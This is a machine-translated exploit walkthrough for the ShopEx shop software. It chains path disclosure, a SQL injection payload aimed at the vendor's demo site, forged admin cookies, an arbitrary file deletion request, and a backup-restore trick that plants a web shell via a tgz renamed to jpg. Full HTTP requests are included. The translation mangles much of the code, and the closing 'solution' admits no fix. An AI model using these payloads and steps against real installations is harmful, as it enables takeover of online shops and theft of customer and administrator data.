ShopEx step by step shell

0x1 explosive path
Http://demo.shopex.com.cn/485/index.php? GOo
 
 
 
Amount ~ This indicates it is useless to me.
 
0x2 injection
Http://demo.shopex.com.cn/485? Member-120120822173108 '/**/and/**/ExtractValue (0x64, concat (0x01, (select/**/@ version ))) /**/order/**/by/**/'1-orderdetail.html
 
 
 
Get an injection point. In general, the next step is to crack the password and solve the md5, but I think my rp is very poor and generally cannot be solved, so the third step...
 
0x3 background cookie settings
Three cookies are set after logon.
 
Setcookie ('shopex _ LG_KEY ', md5 (remote_addr (). $ aResult ['Op _ id']);
Setcookie ("SHOPEX_LOGIN_NAME", $ _ POST ['usrname'], (time () + 86400*10 ));
Setcookie ("SHOPEX_SID", $ this-> sess_id );
 
Function remote_addr (){
If (! Isset ($ GLOBALS ['_ REMOTE_ADDR _']) {
$ Addrs = array ();
 
If (isset ($ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) {
Foreach (array_reverse (explode (',', $ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) as $ x_f)
{
$ X_f = trim ($ x_f );
 
If (preg_match ('/^ \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3 }\. \ d {1, 3} $/', $ x_f ))
{
$ Addrs [] = $ x_f;
}
}
}
 
$ GLOBALS ['_ REMOTE_ADDR _'] = isset ($ addrs [0])? $ Addrs [0]: $ _ SERVER ['remote _ ADDR '];
}
Return $ GLOBALS ['_ REMOTE_ADDR _'];
}
We ran to the XXX_op_sessions table to inject the sess_id, and ran to the XXX_operators table to inject the username and the corresponding op_id. We constructed a cookie to log on to the background. We wanted to use the demo network for testing, as a result, my network is a bit odd. Forget it. The local test is successful ....
 
0x4 arbitrary Background File Deletion
I finally entered the background. Let's have a try.
Construct www.2cto.com
 
 
POST/shopex/shopadmin/index. php? Ctl = system/comeback & act = removeTgz & _ ajax = true & _ ss = setting, tools HTTP/1.1
Host: 10.1.1.100
Proxy-Connection: keep-alive
Content-Length: 38
Origin: http: // 10.1.1.100
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1
Content-type: application/x-www-form-urlencoded; charset = UTF-8
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Referer: http: // 10.1.1.100/shopex/shopadmin/index. php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN, zh; q = 0.8
Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3
Cookie :*********************
 
Tgz [] = multibak_20120822202808.tgz & __ = 1
Replacing tgz [] with the relative path of the file you want to delete is useless to me.
 
 
0x5 use shell in the background
The function corresponding to the demonstration result on the official website is disabled, and the difference in rp can be fully reflected.
Local Testing ~~~
Back up the files first, then download the backup file directly, and modify the file name and content in the compressed file.
 
 


 
Finally, change the suffix of the compressed file to jpg and directly upload the image to obtain the image address.
 
Restore data packet capture changes at data recovery
 
 
GET/shopex/shopadmin/index. php? Ctl = system/comeback & act = comeback & p [0] = multibak_20120822202808.tgz & p [1] = 1345638490 & p [2] = 2 & _ ajax = true & _ ss = setting, tools HTTP/1.1
Host: 10.1.1.100
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Referer: http: // 10.1.1.100/shopex/shopadmin/index. php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN, zh; q = 0.8
Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3
Cookie :******************
 
Change p [0] to the address of the previously uploaded image, for example,/.../../images/default/default_preview_pic.jpg.
Do not pass the interception to the last packet ~ If yes, the temporary files will be deleted.
 
Last shell path:
/Home/tmp/md5 ('/.../../images/default/default_preview_pic.jpg')/yy51_php. SQL
 
Basic principles and
Http://wooyun.org/bugs/wooyun-2012-010431 almost ~ Therefore, we need to cut down a few images.



Solution:

Actually, I don't quite understand either :)